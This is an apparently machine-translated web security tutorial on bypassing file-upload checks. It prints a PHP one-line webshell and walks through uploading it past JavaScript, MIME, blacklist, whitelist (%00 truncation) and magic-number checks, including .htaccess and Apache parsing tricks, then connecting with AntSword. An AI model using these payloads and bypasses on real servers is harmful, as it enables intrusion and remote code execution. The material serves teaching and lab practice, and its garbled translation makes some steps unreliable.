当前位置：网站首页>Web Security Foundation - file upload (file upload bypass)

Usually, the upload page contains special detection files for uploading JavaScript Code , The most common is to check whether the file type and Exhibition name are legal .

Method ：

Disable... On the local browser client JS that will do ;

Using the Firefox browser Noscript plug-in unit 、

IE in Ban JS Etc , utilize burpsuite It can bypass all client detection .

Example operation

JavaScript Bypass

First step , Write a one sentence Trojan horse , Save as php Format

<?php eval($_POST["cmd"]);?>

The second step , Upload this php file , Found upload failed

The third step , close egde Medium js, Steps are as follows

Find settings

Again cookie And close in website data JavaScript

Step four , Upload again php file

Check whether the upload is successful

Step five , Use Chinese ant sword password to connect

Successful connection

Click to open the directory list , Found the file successfully uploaded

Bypass server detection

The server code usually detects three points ：MIME type 、 The contents of the document 、 file extension

Bypass MIME Type detection

common mime type

1. Hypertext markup language text .html text/html
2. Plain text .txt text/plain
3. PDF file .pdf application/pdf
4. Microsoft Word file .word application/msword
5. PNG Images .png image/png
6. GIF graphics .gif image/gif
7. JPEG graphics .jpeg,.jpg image/jpeg
8. au Sound files .au audio/basic
9. MPEG file .mpg,.mpeg video/mpeg
10. AVI file .avi video/x-msvideo
11. GZIP file .gz application/x-gzip

principle ：

Detect the image type during file uploading http Bag Content-Type Value of field , To determine whether the uploaded file is legal .

Method ：

use burpsuite Intercept and modify the file in the package content-type Type .

example ：

MIME Bypass

First step , Write a sentence Trojan horse

<?php eval($_POST["cmd"]);?>

The second step , Upload php File found cannot be uploaded , Use burpsuite Grab upload Upload information to view content-type Change it to image/jpeg Format , Click on Forward Send to browser

The third step , Check whether the file has been uploaded successfully

Use the Chinese ant sword again , Found upload successful

Bypass file suffix detection - The blacklist

The blacklist ：

The extension is illegal in the blacklist , There is usually a special blacklist , It will contain common dangerous script files .

Bypass method

1. Suffix case ：(.Php)

In the judgment of suffix , If you just compare the strings individually to determine whether it is a restricted file , You can use the suffix big

Lower case bypass form .

2. Space around ：(.php)

If the blacklist does not empty the suffix , It can be bypassed by adding a blank after the suffix .

3. Point around ：(.php.)

If the blacklist does not go to the suffix . Handle , utilize Windows The file name feature of the system , Will automatically remove the suffix last

Of ., By adding... After the file name . Go around .

4. ::$DATA Bypass ：

If the blacklist does not go to the suffix ::$DATA Handle , utilize Windows Next NTFS A feature of the file system , Can be in Suffix followed by ::$DATA, Bypass the detection of blacklists .

5. coordination Apache Parsing vulnerabilities ：

Apache Parsing has a feature , When parsing files, judge from right to left , If it is unrecognizable, then judge to the left , Such as

aa.php.owf.rar file ,Apache Unrecognized parsing ‘.owf’ and ‘.rar’ These two suffixes , It will be resolved into .php file .

6. .htaccess file ：

Cooperate with the list , Upload a custom .htaccess , You can easily bypass various tests .htaccess file ( perhaps " Distributed profile "）, The full name is Hypertext Access ( Hypertext entry ). Provides directory changes Method of changing configuration , namely , Place a file containing one or more instructions in a specific document directory , To apply to this directory and all its subdirectories . As the user , The commands available are limited .

example

http://120.27.61.239:8003/source/04/index.php

Bypass file suffix detection - White list

White list ：

If the file extension is not in the white list, it is illegal .

Bypass method ：

The server judges the file type from the back to the front , The file parsing is from front to back , You can use 00 Truncated square

Type to bypass , Include MIME modify 、%00 truncation 、0x00 truncation .

%00 truncation ：
url Sent to the server and decoded by the server , At this time, it has not been transferred to the verification function , In other words, what is received in the verification function is not %00 character , and
yes %00 The decoded content , That is, it is decoded into 0x00.
0x00 truncation ：
When the system reads the file name , If you encounter 0x00, It will be considered that the reading has ended . But it should be noted that the hexadecimal content of the file
00, Not in the file name 00.

Bypass file content detection

Generally, the content of the file is detected to determine whether the uploaded file is legal

Method ：

1. Judge by detecting the magic number of the file at the beginning of the uploaded file content .

2. File loading detection It's usually called API Or function to load the file . Common is image rendering test , More strictly, even secondary rendering .

Magic numbers of common image types are as follows ：

To bypass jpg File magic number detection is to write the following values at the beginning of the file ：

Value = FF D8 FF E0 00 10 4A 46 49 46

To bypass gif File magic number detection is to write the following values at the beginning of the file ：

Value = 47 49 46 38 39 61

To bypass png File magic number detection is to write the following values at the beginning of the file ：

Value = 89 50 4E 47

Then add your own sentence to the magic number of the file, and the Trojan code is ok

Header bypass

File loading detection

It's usually called API Or function to perform file loading test , We often use image rendering test , Strictly carry out secondary rendering .

Pair rendering / The attack method of loading test is code injection

The way to attack secondary rendering is to attack the file loader itself

1. Pair rendering / Load test attack - Code injection bypasses

You can use image processing software to inject code into a picture

The principle of this kind of attack is ： Find a blank area to fill in the code without destroying the rendering of the file itself , Generally, it is the annotation of the picture District , This ensures that the file structure is complete , Basically, the rendering test can be bypassed

2. The attack method of secondary rendering - Attack the file loader itself

In this case, code injection cannot be used to bypass , Second rendering is equivalent to grabbing out the part originally belonging to image data , Using your own API or Function to re render , The non image data part is directly isolated .

We can use overflow attack to attack the file loader , Upload your own malicious file , The file loader on the server will actively enter Line load test , When loading the test, it is executed by overflow attack shellcode.

原网站

版权声明
本文为[Kill the celery]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/205/202207241015404565.html